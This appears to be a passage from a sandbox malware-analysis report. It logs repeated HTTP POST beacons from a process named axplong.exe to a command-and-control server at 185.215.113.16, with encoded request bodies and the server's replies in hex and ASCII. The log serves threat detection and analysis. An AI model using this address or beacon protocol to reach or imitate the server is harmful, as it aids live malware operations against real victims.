Jul 26, 2024 20:59:17.975611925 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:18.225573063 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49718	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:18.334990025 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:19.122694969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:19.123709917 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:19.375066996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49719	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:19.491379976 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:20.281785965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:20.282890081 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:20.543345928 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49720	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:20.663923979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:21.412055016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:21.415652037 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:21.671369076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49721	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:21.789062977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:22.565438986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:22.566241980 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:22.830981970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49722	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:22.946376085 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:23.721822977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:23.722713947 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:23.971482038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49723	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:24.087443113 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:24.839623928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:24.840555906 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:25.089128971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49724	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:25.211030006 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:26.012787104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:26.013551950 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:26.261593103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49725	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:26.381644964 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:27.143990040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:27.144716978 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:27.395840883 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	51099	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:27.506100893 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:28.273273945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:28.274797916 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:28.553694963 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	51101	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:28.665229082 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:29.438251019 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:29.439372063 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:29.691092014 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	51102	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:29.811546087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:30.561515093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:30.562540054 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 20:59:30.812402010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	51104	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:30.933804989 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:31.708218098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:31.709012985 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
